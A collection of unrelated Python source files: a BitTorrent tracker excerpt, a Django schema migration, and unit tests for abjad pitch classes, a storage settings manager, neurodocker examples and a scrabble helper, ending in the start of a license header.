        return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                bencode({'failure reason': self.allowed[infohash]['failure reason']}))
    return None
def add_data(self, infohash, event, ip, paramslist):
    """Validate an announce and update the per-torrent peer tables.

    Raises ValueError on malformed announce parameters (caller maps this
    to HTTP 400).  Returns the number of peers the response should carry.
    """
    peers = self.downloads.setdefault(infohash, {})
    ts = self.times.setdefault(infohash, {})
    self.completed.setdefault(infohash, 0)
    self.seedcount.setdefault(infohash, 0)
    def params(key, default = None, l = paramslist):
        # Announce parameters arrive as lists; take the first value.
        if l.has_key(key):
            return l[key][0]
        return default
    # --- parameter validation -------------------------------------------
    myid = params('peer_id','')
    if len(myid) != 20:
        raise ValueError, 'id not of length 20'
    if event not in ['started', 'completed', 'stopped', 'snooped', None]:
        raise ValueError, 'invalid event'
    port = int(params('port',''))
    if port < 0 or port > 65535:
        raise ValueError, 'invalid port'
    left = int(params('left',''))
    if left < 0:
        raise ValueError, 'invalid amount left'
    peer = peers.get(myid)
    mykey = params('key')
    # A returning peer is authenticated by its key or by announcing from
    # the same IP it used before.
    auth = not peer or peer.get('key', -1) == mykey or peer.get('ip') == ip
    gip = params('ip')   # IP the client claims for itself ('given ip')
    local_override = gip and self.allow_local_override(ip, gip)
    if local_override:
        ip1 = gip
    else:
        ip1 = ip
    if not auth and local_override and self.only_local_override_ip:
        auth = True
    if params('numwant') is not None:
        rsize = min(int(params('numwant')), self.max_give)
    else:
        rsize = self.response_size
    if event == 'stopped':
        # Peer is leaving: drop it (only if it proved its identity).
        if peer and auth:
            self.delete_peer(infohash,myid)
    elif not peer:
        # --- brand new peer ---------------------------------------------
        ts[myid] = time()
        peer = {'ip': ip, 'port': port, 'left': left}
        if mykey:
            peer['key'] = mykey
        if gip:
            peer['given ip'] = gip
        if port:
            if not self.natcheck or (local_override and self.only_local_override_ip):
                # NAT checking disabled/bypassed: trust the peer immediately.
                peer['nat'] = 0
                self.natcheckOK(infohash,myid,ip1,port,left)
            else:
                # Asynchronous connect-back test; result arrives via
                # connectback_result().
                NatCheck(self.connectback_result,infohash,myid,ip1,port,self.rawserver)
        else:
            # Port 0: peer cannot accept connections at all.
            peer['nat'] = 2**30
        if event == 'completed':
            self.completed[infohash] += 1
        if not left:
            self.seedcount[infohash] += 1
        peers[myid] = peer
    else:
        # --- returning peer ---------------------------------------------
        if not auth:
            return rsize    # return w/o changing stats
        ts[myid] = time()
        if not left and peer['left']:
            # Leecher just became a seed: move its becache entries from the
            # leecher slot (0) to the seed slot (1).
            self.completed[infohash] += 1
            self.seedcount[infohash] += 1
            if not peer.get('nat', -1):
                for bc in self.becache[infohash]:
                    bc[1][myid] = bc[0][myid]
                    del bc[0][myid]
        if peer['left']:
            peer['left'] = left
        recheck = False
        if ip != peer['ip']:
            peer['ip'] = ip
            recheck = True
        if gip != peer.get('given ip'):
            if gip:
                peer['given ip'] = gip
            elif peer.has_key('given ip'):
                del peer['given ip']
            if local_override:
                if self.only_local_override_ip:
                    self.natcheckOK(infohash,myid,ip1,port,left)
                else:
                    recheck = True
        if port and self.natcheck:
            if recheck:
                # Address changed: discard the old NAT verdict and its
                # cached becache entries before re-testing.
                if peer.has_key('nat'):
                    if not peer['nat']:
                        l = self.becache[infohash]
                        y = not peer['left']
                        for x in l:
                            del x[y][myid]
                    del peer['nat'] # restart NAT testing
            else:
                # Previously failed checks: retry until the configured limit.
                natted = peer.get('nat', -1)
                if natted and natted < self.natcheck:
                    recheck = True
            if recheck:
                NatCheck(self.connectback_result,infohash,myid,ip1,port,self.rawserver)
    return rsize
def peerlist(self, infohash, stopped, is_seed, return_type, rsize):
    """Assemble the announce response dictionary for one torrent.

    return_type selects the peer encoding: 0 = full dicts with peer ids,
    1 = dicts without peer ids, 2 = compact binary strings.  Peers are
    served out of a shuffled per-torrent cache; seeds (is_seed) are never
    given other seeds.
    """
    data = {}    # return data
    seeds = self.seedcount[infohash]
    data['complete'] = seeds
    data['incomplete'] = len(self.downloads[infohash]) - seeds
    if ( self.allowed is not None and self.config['allowed_controls'] and
         self.allowed[infohash].has_key('warning message') ):
        data['warning message'] = self.allowed[infohash]['warning message']
    data['interval'] = self.reannounce_interval
    if stopped or not rsize:    # save some bandwidth
        data['peers'] = []
        return data
    # becache layout: [encoding][0]=leechers, [encoding][1]=seeds.
    bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
    len_l = len(bc[0][0])
    len_s = len(bc[0][1])
    if not (len_l+len_s):    # caches are empty!
        data['peers'] = []
        return data
    # Number of leechers to hand out, proportional to the population.
    l_get_size = int(float(rsize)*(len_l)/(len_l+len_s))
    cache = self.cached.setdefault(infohash,[None,None,None])[return_type]
    if cache:
        # Invalidate the cache when it is stale or nearly drained.
        if cache[0] + self.config['min_time_between_cache_refreshes'] < time():
            cache = None
        else:
            if ( (is_seed and len(cache[1]) < rsize)
                 or len(cache[1]) < l_get_size or not cache[1] ):
                cache = None
    if not cache:
        # Rebuild: cache = [timestamp, shuffled leechers, shuffled seeds].
        vv = [[],[],[]]
        cache = [ time(),
                  bc[return_type][0].values()+vv[return_type],
                  bc[return_type][1].values() ]
        shuffle(cache[1])
        shuffle(cache[2])
        self.cached[infohash][return_type] = cache
        for rr in xrange(len(self.cached[infohash])):
            if rr != return_type:
                try:
                    self.cached[infohash][rr][1].extend(vv[rr])
                except:
                    pass
    if len(cache[1]) < l_get_size:
        # Not enough leechers cached: drain everything we have.
        peerdata = cache[1]
        if not is_seed:
            peerdata.extend(cache[2])
        cache[1] = []
        cache[2] = []
    else:
        if not is_seed:
            # Take seeds first, then top up with leechers.
            peerdata = cache[2][l_get_size-rsize:]
            del cache[2][l_get_size-rsize:]
            rsize -= len(peerdata)
        else:
            peerdata = []
        if rsize:
            peerdata.extend(cache[1][-rsize:])
            del cache[1][-rsize:]
    if return_type == 2:
        # Compact format: concatenate the 6-byte ip/port strings.
        peerdata = ''.join(peerdata)
    data['peers'] = peerdata
    return data
def get(self, connection, path, headers):
    """HTTP dispatch: route a request to the info page, scrape, file
    download, favicon, or the announce handler.

    Returns an (http_code, message, headers_dict, body) tuple.
    """
    ip = connection.get_ip()
    nip = get_forwarded_ip(headers)
    if nip and not self.only_local_override_ip:
        # Trust X-Forwarded-For style headers when allowed.
        ip = nip
    paramslist = {}
    def params(key, default = None, l = paramslist):
        # Query parameters are stored as lists; return the first value.
        if l.has_key(key):
            return l[key][0]
        return default
    try:
        (scheme, netloc, path, pars, query, fragment) = urlparse(path)
        if self.uq_broken == 1:
            # Work around clients that fail to quote '+' properly.
            path = path.replace('+',' ')
            query = query.replace('+',' ')
        path = unquote(path)[1:]
        # Parse the query string by hand so repeated keys accumulate.
        for s in query.split('&'):
            if s != '':
                i = s.index('=')
                kw = unquote(s[:i])
                paramslist.setdefault(kw, [])
                paramslist[kw] += [unquote(s[i+1:])]
        if path == '' or path == 'index.html':
            return self.get_infopage()
        if path == 'scrape':
            return self.get_scrape(paramslist)
        if (path == 'file'):
            return self.get_file(params('info_hash'))
        if path == 'favicon.ico' and self.favicon is not None:
            return (200, 'OK', {'Content-Type' : 'image/x-icon'}, self.favicon)
        if path != 'announce':
            return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
        # main tracker function
        infohash = params('info_hash')
        if not infohash:
            raise ValueError, 'no info hash'
        notallowed = self.check_allowed(infohash, paramslist)
        if notallowed:
            return notallowed
        event = params('event')
        rsize = self.add_data(infohash, event, ip, paramslist)
    except ValueError, e:
        # Any malformed parameter surfaces here as a 400.
        return (400, 'Bad Request', {'Content-Type': 'text/plain'},
                'you sent me garbage - ' + str(e))
    # Peer-list encoding: compact binary > no peer ids > full dicts.
    if params('compact'):
        return_type = 2
    elif params('no_peer_id'):
        return_type = 1
    else:
        return_type = 0
    data = self.peerlist(infohash, event=='stopped', not params('left'),
                         return_type, rsize)
    if paramslist.has_key('scrape'):
        # Optional inline scrape data (no name, to keep responses small).
        data['scrape'] = self.scrapedata(infohash, False)
    return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode(data))
def natcheckOK(self, infohash, peerid, ip, port, not_seed):
    """Record a NAT-check pass: pre-encode the peer into all three becache
    formats (full dict, no-peer-id dict, compact) under the seed/leecher slot."""
    bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
    slot = not not_seed  # index 1 for seeds (left == 0), 0 for leechers
    bc[0][slot][peerid] = Bencached(bencode({'ip': ip, 'port': port,
                                            'peer id': peerid}))
    bc[1][slot][peerid] = Bencached(bencode({'ip': ip, 'port': port}))
    bc[2][slot][peerid] = compact_peer_info(ip, port)
def natchecklog(self, peerid, ip, port, result):
    # Emit an Apache-combined-style log line for a NAT-check probe;
    # `result` is an HTTP-like status code (200/404/503).
    year, month, day, hour, minute, second, a, b, c = localtime(time())
    print '%s - %s [%02d/%3s/%04d:%02d:%02d:%02d] "!natcheck-%s:%i" %i 0 - -' % (
        ip, quote(peerid), day, months[month], year, hour, minute, second,
        ip, port, result)
def connectback_result(self, result, downloadid, peerid, ip, port):
    """NatCheck callback: `result` is true when the tracker managed to open
    a TCP connection back to the peer (i.e. the peer is reachable)."""
    record = self.downloads.get(downloadid, {}).get(peerid)
    if ( record is None
         or (record['ip'] != ip and record.get('given ip') != ip)
         or record['port'] != port ):
        # Peer re-announced with different details while the check ran;
        # the result no longer applies.
        if self.config['log_nat_checks']:
            self.natchecklog(peerid, ip, port, 404)
        return
    if self.config['log_nat_checks']:
        if result:
            x = 200
        else:
            x = 503
        self.natchecklog(peerid, ip, port, x)
    if not record.has_key('nat'):
        # First verdict: nat == 0 means reachable.
        record['nat'] = int(not result)
        if result:
            self.natcheckOK(downloadid,peerid,ip,port,record['left'])
    elif result and record['nat']:
        # Was failing before, reachable now: reset the failure counter.
        record['nat'] = 0
        self.natcheckOK(downloadid,peerid,ip,port,record['left'])
    elif not result:
        # Another failed attempt; add_data retries up to self.natcheck times.
        record['nat'] += 1
def save_dfile(self):
    """Periodically persist the tracker state to the dfile (bencoded)."""
    # Re-schedule first so one failed write cannot stop future saves.
    self.rawserver.add_task(self.save_dfile, self.save_dfile_interval)
    # Context manager guarantees the handle is closed even when
    # bencode()/write() raises (the explicit close() was skipped on error).
    with open(self.dfile, 'wb') as h:
        h.write(bencode(self.state))
def parse_allowed(self):
    """Periodic rescan of allowed_dir: refresh the allowed-torrent tables
    and register any newly discovered torrents."""
    self.rawserver.add_task(self.parse_allowed, self.parse_dir_interval)
    # logging broken .torrent files would be useful but could confuse
    # programs parsing log files, so errors are just ignored for now
    def ignore(message):
        pass
    r = parsedir(self.allowed_dir, self.allowed, self.allowed_dir_files,
                 self.allowed_dir_blocked, ignore,include_metainfo = False)
    ( self.allowed, self.allowed_dir_files, self.allowed_dir_blocked,
      added, garbage2 ) = r
    for infohash in added:
        # Newly discovered torrents start with empty peer/stat tables.
        self.downloads.setdefault(infohash, {})
        self.completed.setdefault(infohash, 0)
        self.seedcount.setdefault(infohash, 0)
    # Mirror into the persisted state so save_dfile() captures it.
    self.state['allowed'] = self.allowed
    self.state['allowed_dir_files'] = self.allowed_dir_files
def delete_peer(self, infohash, peerid):
    """Remove one peer from every tracking structure for this torrent."""
    peers = self.downloads[infohash]
    record = peers[peerid]
    if not record['left']:
        # A departing seed lowers the seed count.
        self.seedcount[infohash] -= 1
    if not record.get('nat', -1):
        # Peer had passed the NAT check, so it sits in the becache; purge
        # its entry from each of the three encodings.
        slot = not record['left']
        for pair in self.becache[infohash]:
            del pair[slot][peerid]
    del self.times[infohash][peerid]
    del peers[peerid]
def expire_downloaders(self):
    """Periodic reaper: drop peers that have not announced since the last
    sweep, then forget empty torrents (unless keep_dead or still allowed)."""
    # NOTE: .items() returns a list in Python 2, so deleting entries while
    # iterating over the snapshot is safe here.
    for infohash, peertimes in self.times.items():
        for myid, t in peertimes.items():
            if t < self.prevtime:
                self.delete_peer(infohash, myid)
    self.prevtime = time()
    if (self.keep_dead != 1):
        for key, peers in self.downloads.items():
            if len(peers) == 0 and (self.allowed is None or
                                    key not in self.allowed):
                del self.times[key]
                del self.downloads[key]
                del self.seedcount[key]
    self.rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval)
def track(args):
    """Command-line entry point: parse options, write a pid file, and run
    the tracker's HTTP server until shutdown."""
    if len(args) == 0:
        # No arguments: print the option reference and exit.
        print formatDefinitions(defaults, 80)
        return
    try:
        config, files = parseargs(args, defaults, 0, 0)
    except ValueError, e:
        print _("error: ") + str(e)
        print _("run with no arguments for parameter explanations")
        return
    file(config['pid'], 'w').write(str(os.getpid()))
    r = RawServer(Event(), config)
    t = Tracker(config, r)
    s = r.create_serversocket(config['port'], config['bind'], True)
    r.start_listening(s, HTTPHandler(t.get, config['min_time_between_log_flushes']))
    r.listen_forever()  # blocks until shutdown is requested
    t.save_dfile()      # final state flush on the way out
    print _("# Shutting down: ") + isotime()
def size_format(s):
    """Format a byte count with binary units (B, KiB, MiB, GiB, TiB).

    KiB/MiB values are truncated to whole units; GiB/TiB keep two
    truncated decimal places.
    """
    if s < 1024:
        return str(s) + 'B'
    if s < 1048576:
        return str(int(s / 1024)) + 'KiB'
    if s < 1073741824:
        return str(int(s / 1048576)) + 'MiB'
    if s < 1099511627776:
        return str(int((s / 1073741824.0) * 100.0) / 100.0) + 'GiB'
    return str(int((s / 1099511627776.0) * 100.0) / 100.0) + 'TiB'
|
# Generated by Django 2.0.7 on 2018-08-01 12:00
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import picker.models
class Migration(migrations.Migration):
    """Picker app schema update (auto-generated by Django 2.0.7 on 2018-08-01).

    Introduces PickerFavorite/PickerGrouping/PickerMembership, adds league
    season/slug fields, and retires the per-user Preference fields that the
    new models replace.  Auto-generated: edit only via new migrations.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('picker', '0002_auto_20160720_0917'),
    ]

    operations = [
        # --- new models -------------------------------------------------
        migrations.CreateModel(
            name='PickerFavorite',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        migrations.CreateModel(
            name='PickerGrouping',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=75, unique=True)),
                ('status', models.CharField(choices=[('ACTV', 'Active'), ('IDLE', 'Inactive')], default='ACTV', max_length=4)),
            ],
        ),
        migrations.CreateModel(
            name='PickerMembership',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('status', models.CharField(choices=[('ACTV', 'Active'), ('IDLE', 'Inactive'), ('SUSP', 'Suspended'), ('MNGT', 'Manager')], default='ACTV', max_length=4)),
                ('autopick', models.CharField(choices=[('NONE', 'None'), ('RAND', 'Random')], default='RAND', max_length=4)),
                ('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='members', to='picker.PickerGrouping')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='picker_memberships', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # --- new fields on existing models ------------------------------
        migrations.AddField(
            model_name='league',
            name='current_season',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='league',
            name='slug',
            field=models.SlugField(default=picker.models.temp_slug),
        ),
        migrations.AddField(
            model_name='pickset',
            name='is_winner',
            field=models.BooleanField(default=False),
        ),
        # --- field alterations ------------------------------------------
        migrations.AlterField(
            model_name='game',
            name='category',
            field=models.CharField(choices=[('REG', 'Regular Season'), ('POST', 'Post Season'), ('PRE', 'Pre Season'), ('FRND', 'Friendly')], default='REG', max_length=4),
        ),
        migrations.AlterField(
            model_name='game',
            name='status',
            field=models.CharField(choices=[('U', 'Unplayed'), ('T', 'Tie'), ('H', 'Home Win'), ('A', 'Away Win'), ('X', 'Cancelled')], default='U', max_length=1),
        ),
        migrations.AlterField(
            model_name='game',
            name='tv',
            field=models.CharField(blank=True, max_length=8, verbose_name='TV'),
        ),
        migrations.AlterField(
            model_name='gameset',
            name='byes',
            field=models.ManyToManyField(blank=True, related_name='bye_set', to='picker.Team', verbose_name='Bye Teams'),
        ),
        migrations.AlterField(
            model_name='league',
            name='logo',
            field=models.ImageField(blank=True, null=True, upload_to='picker/logos'),
        ),
        migrations.AlterField(
            model_name='pickset',
            name='strategy',
            field=models.CharField(choices=[('USER', 'User'), ('RAND', 'Random'), ('HOME', 'Home Team'), ('BEST', 'Best Record')], default='USER', max_length=4),
        ),
        migrations.AlterField(
            model_name='playoffpicks',
            name='user',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='preference',
            name='autopick',
            field=models.CharField(choices=[('NONE', 'None'), ('RAND', 'Random')], default='RAND', max_length=4),
        ),
        migrations.AlterField(
            model_name='team',
            name='logo',
            field=models.ImageField(blank=True, null=True, upload_to='picker/logos'),
        ),
        migrations.AlterUniqueTogether(
            name='preference',
            unique_together=set(),
        ),
        # --- wiring for the new models ----------------------------------
        migrations.AddField(
            model_name='pickergrouping',
            name='leagues',
            field=models.ManyToManyField(blank=True, to='picker.League'),
        ),
        migrations.AddField(
            model_name='pickerfavorite',
            name='league',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='picker.League'),
        ),
        migrations.AddField(
            model_name='pickerfavorite',
            name='team',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='picker.Team'),
        ),
        migrations.AddField(
            model_name='pickerfavorite',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        # --- Preference fields superseded by the new models -------------
        migrations.RemoveField(
            model_name='preference',
            name='favorite_team',
        ),
        migrations.RemoveField(
            model_name='preference',
            name='league',
        ),
        migrations.RemoveField(
            model_name='preference',
            name='status',
        ),
    ]
|
import typing
import pytest
import abjad
# Parametrization table: (constructor input, expected semitone count) pairs.
# Quarter-tone sweep over +/- four octaves, followed by hand-picked cases
# (strings, tuples, pitch objects, None, and one invalid input).
values: typing.List[typing.Tuple] = [(x / 2, (x / 2) % 12) for x in range(-48, 49)]
values += [
    ("bf,", 10),
    ("c'", 0),
    ("cs'", 1),
    ("gff''", 5),
    ("", 0),
    ("dss,,", 4),
    ("fake", ValueError),
    (("bf", 2), 10),
    (("c", 4), 0),
    (("cs", 4), 1),
    (("dss", 1), 4),
    (("gff", 5), 5),
    (abjad.NamedPitch("bs'"), 0),
    (abjad.NamedPitch("c"), 0),
    (abjad.NamedPitch("cf,"), 11),
    (abjad.NamedPitch(), 0),
    (abjad.NamedPitchClass("cs'"), 1),
    (abjad.NamedPitchClass("c"), 0),
    (abjad.NamedPitchClass("cf,"), 11),
    (None, 0),
    (abjad.NumberedPitch("bs'"), 0),
    (abjad.NumberedPitch("c"), 0),
    (abjad.NumberedPitch("cf,"), 11),
    (abjad.NumberedPitch(), 0),
    (abjad.NumberedPitchClass("bs'"), 0),
    (abjad.NumberedPitchClass("c"), 0),
    (abjad.NumberedPitchClass("cf,"), 11),
]
@pytest.mark.parametrize("input_, expected_semitones", values)
def test_init(input_, expected_semitones):
    """NumberedPitchClass accepts many input types; exception classes in the
    table mark inputs that must raise."""
    expects_error = isinstance(expected_semitones, type) and issubclass(
        expected_semitones, Exception
    )
    if expects_error:
        with pytest.raises(expected_semitones):
            abjad.NumberedPitchClass(input_)
    else:
        instance = abjad.NumberedPitchClass(input_)
        assert float(instance) == expected_semitones
|
# Copyright (C) 2012 Red Hat, Inc. All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors: Jan Safranek <jsafrane@redhat.com>
# -*- coding: utf-8 -*-
from StorageConfiguration import StorageConfiguration
from SettingManager import SettingManager, Setting
import unittest
import os
import shutil
class TestSetting(unittest.TestCase):
    """Tests for SettingManager loading, saving and deleting Setting
    instances from the preconfigured (etc) and persistent (var) trees.

    Fixture data lives under ./configs/<case>/{etc,var}/ next to this file.
    """

    def setUp(self):
        # Directory of this test module; fall back to '.' when run from it.
        self.directory = os.path.dirname(__file__)
        if not self.directory:
            self.directory = "."
        # Point at a nonexistent config so defaults are used.
        StorageConfiguration.CONFIG_FILE = "/not/existing"
        self.config = StorageConfiguration()

    def test_missing(self):
        """
        Test loading persistent and preconfigured setting when appropriate
        directories are missing.
        """
        self.config.CONFIG_PATH = self.directory + "/configs/missing/etc/"
        self.config.PERSISTENT_PATH = self.directory + "/configs/missing/var/"
        mgr = SettingManager(self.config)
        mgr.load()
        self.assertDictEqual(mgr.classes, {})

    def test_empty(self):
        """
        Test loading persistent and preconfigured setting when appropriate
        directories are empty.
        """
        self.config.CONFIG_PATH = self.directory + "/configs/empty/etc/"
        self.config.PERSISTENT_PATH = self.directory + "/configs/empty/var/"
        mgr = SettingManager(self.config)
        mgr.load()
        self.assertDictEqual(mgr.classes, {})

    def test_full(self):
        """
        Test loading persistent and preconfigured setting when appropriate
        directories are fully populated.
        """
        self.config.CONFIG_PATH = self.directory + "/configs/full/etc/"
        self.config.PERSISTENT_PATH = self.directory + "/configs/full/var/"
        mgr = SettingManager(self.config)
        mgr.load()
        # check LMI_StorageSetting class loaded OK
        self.assertTrue(mgr.classes.has_key("LMI_StorageSetting"))
        # check it has all instances
        settings = mgr.get_settings("LMI_StorageSetting")
        self.assertIn("LMI:StorageSetting:preconfigured1", settings.keys())
        self.assertIn("LMI:StorageSetting:preconfigured2", settings.keys())
        self.assertIn("LMI:StorageSetting:persistent1", settings.keys())
        self.assertIn("LMI:StorageSetting:persistent2", settings.keys())
        self.assertEqual(len(settings.keys()), 4)
        # check one preconfigured setting
        s1 = settings['LMI:StorageSetting:preconfigured1']
        self.assertEqual(s1.id, "LMI:StorageSetting:preconfigured1")
        self.assertEqual(s1.type, Setting.TYPE_PRECONFIGURED)
        self.assertEqual(s1['first'], "1")
        self.assertEqual(s1['second'], "two")
        self.assertEqual(s1['third'], "3.0")
        # check one persistent setting
        s2 = settings['LMI:StorageSetting:persistent2']
        self.assertEqual(s2.id, "LMI:StorageSetting:persistent2")
        self.assertEqual(s2.type, Setting.TYPE_PERSISTENT)
        self.assertEqual(s2['first'], "1000")
        self.assertEqual(s2['second'], "two thousand")
        self.assertEqual(s2['third'], "3000.0")

    def test_save_load(self):
        """ Test saving a persistent settings and loading them back."""
        # load the 'full' settings
        self.config.CONFIG_PATH = self.directory + "/configs/full/etc/"
        self.config.PERSISTENT_PATH = self.directory + "/configs/full/var/"
        mgr = SettingManager(self.config)
        mgr.load()
        # dirty hack to save it to different directory...
        self.config.PERSISTENT_PATH = self.directory + "/configs/save_load/var/"
        # add one transient setting
        s = Setting(Setting.TYPE_TRANSIENT, "LMI:StorageSetting:transient1")
        s['first'] = "111"
        s['second'] = "two two two"
        s['third'] = "333.0"
        mgr.set_setting("LMI_StorageSetting", s)
        # add one preconfigured setting (this should not happen in reality,
        # but let's test it).
        s = Setting(Setting.TYPE_PRECONFIGURED, "LMI:StorageSetting:preconfigured3")
        s['first'] = "1111"
        s['second'] = "two two two two"
        s['third'] = "3333.0"
        mgr.set_setting("LMI_StorageSetting", s)
        # add one persistent setting
        s = Setting(Setting.TYPE_PERSISTENT, "LMI:StorageSetting:persistent3")
        s['first'] = "11"
        s['second'] = "two two"
        s['third'] = "33.0"
        mgr.set_setting("LMI_StorageSetting", s)
        # the persistent setting should be saved
        # try to reload the cofig - it should remove the preconfigured one
        mgr.load()
        # check it has all instances and that the preconfigured is gone
        settings = mgr.get_settings("LMI_StorageSetting")
        self.assertIn("LMI:StorageSetting:preconfigured1", settings.keys())
        self.assertIn("LMI:StorageSetting:preconfigured2", settings.keys())
        self.assertIn("LMI:StorageSetting:persistent1", settings.keys())
        self.assertIn("LMI:StorageSetting:persistent2", settings.keys())
        self.assertIn("LMI:StorageSetting:persistent3", settings.keys())
        self.assertIn("LMI:StorageSetting:transient1", settings.keys())
        self.assertEqual(len(settings.keys()), 6)
        # check the transient is ok
        s1 = settings['LMI:StorageSetting:transient1']
        self.assertEqual(s1.id, "LMI:StorageSetting:transient1")
        self.assertEqual(s1.type, Setting.TYPE_TRANSIENT)
        self.assertEqual(s1['first'], "111")
        self.assertEqual(s1['second'], "two two two")
        self.assertEqual(s1['third'], "333.0")
        # check the persistent is there
        s2 = settings['LMI:StorageSetting:persistent3']
        self.assertEqual(s2.id, "LMI:StorageSetting:persistent3")
        self.assertEqual(s2.type, Setting.TYPE_PERSISTENT)
        self.assertEqual(s2['first'], "11")
        self.assertEqual(s2['second'], "two two")
        self.assertEqual(s2['third'], "33.0")
        # remove one persistent, it should be saved imediatelly
        mgr.delete_setting('LMI_StorageSetting', s2)
        # check it is really removed
        mgr = SettingManager(self.config)
        mgr.load()
        settings = mgr.get_settings("LMI_StorageSetting")
        self.assertNotIn("LMI:StorageSetting:persistent3", settings.keys())
        # change one persistent, it should be saved imediatelly
        s3 = settings['LMI:StorageSetting:persistent2']
        s3['first'] = "-1"
        s3['second'] = "minus one"
        s3['third'] = "-3.0"
        mgr.set_setting('LMI_StorageSetting', s3)
        # check the change is really persisted
        mgr = SettingManager(self.config)
        mgr.load()
        settings = mgr.get_settings("LMI_StorageSetting")
        s3 = settings['LMI:StorageSetting:persistent2']
        self.assertEqual(s3.id, "LMI:StorageSetting:persistent2")
        self.assertEqual(s3.type, Setting.TYPE_PERSISTENT)
        self.assertEqual(s3['first'], "-1")
        self.assertEqual(s3['second'], "minus one")
        self.assertEqual(s3['third'], "-3.0")

    def tearDown(self):
        # remove any files in configs/save_load/var/
        path = self.directory + "/configs/save_load/var/"
        shutil.rmtree(path, ignore_errors=True)
if __name__ == '__main__':
unittest.main()
|
"""Run the neurodocker examples and check for failures."""
import glob
import os
import subprocess
# Directory containing this test module (and the example files it drives).
here = os.path.dirname(os.path.realpath(__file__))
def test_examples_readme():
    """Run every `neurodocker generate` command listed in examples/README.md."""
    with open(os.path.join(here, "README.md")) as f:
        readme = f.read()
    # Join backslash line continuations so each command is a single line.
    readme = readme.replace("\\\n", " ")
    cmds = []
    for line in readme.splitlines():
        if not line.startswith("neurodocker generate"):
            continue
        parts = line.split()
        if 'docker' in parts[2] and 'singularity' in parts[2]:
            # Placeholder target (e.g. "[docker|singularity]"): run both.
            for target in ('docker', 'singularity'):
                parts[2] = target
                cmds.append(" ".join(parts))
        else:
            cmds.append(line)
    print("Testing {} commands from the examples README".format(len(cmds)))
    with TemporaryChDir(here):
        for c in cmds:
            subprocess.run(c, shell=True, check=True)
def test_specialized_examples():
    """Execute each specialized example's generate.sh script and fail on error."""
    scripts = glob.glob(os.path.join(here, "**", "generate.sh"))
    print("Testing {} commands from specialized examples".format(len(scripts)))
    with TemporaryChDir(here):
        for script in scripts:
            subprocess.run(script, shell=True, check=True)
class TemporaryChDir:
    """Context manager that chdirs into `wd` and restores the original
    working directory on exit (even when the body raises)."""

    def __init__(self, wd):
        self.wd = wd
        self._wd_orig = os.getcwd()  # captured at construction time

    def __enter__(self):
        os.chdir(self.wd)
        # Return self so `with TemporaryChDir(d) as ctx:` binds the manager
        # (previously returned None).
        return self

    def __exit__(self, exc_type, exc_value, tb):
        os.chdir(self._wd_orig)
|
#! /usr/bin/env python
#
# Ben Osment
# Mon Nov 11 06:39:55 2013
"""Unit tests for scrabble.py"""
import unittest
import sys
import os
# Resolve the project layout relative to the invocation directory:
# sources live in ./scrabble, test fixtures in ./tests.
# NOTE(review): this assumes the tests are run from the repository root.
current_dir = os.getcwd()
src_dir = os.path.join(current_dir, 'scrabble')
tests_dir = os.path.join(current_dir, 'tests')
# add the source directory to the load path
sys.path.append(src_dir)
import scrabble
class TestScrabble(unittest.TestCase):
    """Unit tests for the scrabble helper functions."""

    def setUp(self):
        # Small fixture wordlist and a shared rack of letters.
        self.words = scrabble.build_wordlist(os.path.join(tests_dir,
                                                          'test_wordlist.txt'))
        self.letters = 'dogcatrbbit'

    def test_wordlist(self):
        correct_words = ['dog', 'cat', 'rabbit']
        # assertEqual: assertEquals is a deprecated alias (removed in Python 3.12).
        self.assertEqual(self.words, correct_words)

    def test_highest(self):
        self.assertEqual(scrabble.find_highest(self.letters,
                                               self.words), 'rabbit')

    def test_wordscore(self):
        self.assertEqual(scrabble.get_word_score('faze'), 16)
        self.assertEqual(scrabble.get_word_score('fiz'), 15)
        self.assertEqual(scrabble.get_word_score('ben'), 5)

    def test_creatable(self):
        self.assertTrue(scrabble.creatable('hat', 'aahhtt'))
        self.assertFalse(scrabble.creatable('noon', 'nott'))

    def test_all_scores(self):
        ans = [('rabbit', 10), ('dog', 5), ('cat', 5)]
        self.assertEqual(scrabble.all_scores(self.letters, self.words), ans)
if __name__ == '__main__':
unittest.main()
|
# Copyright 2017 The 'Scalable Private Learning with PATE' Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
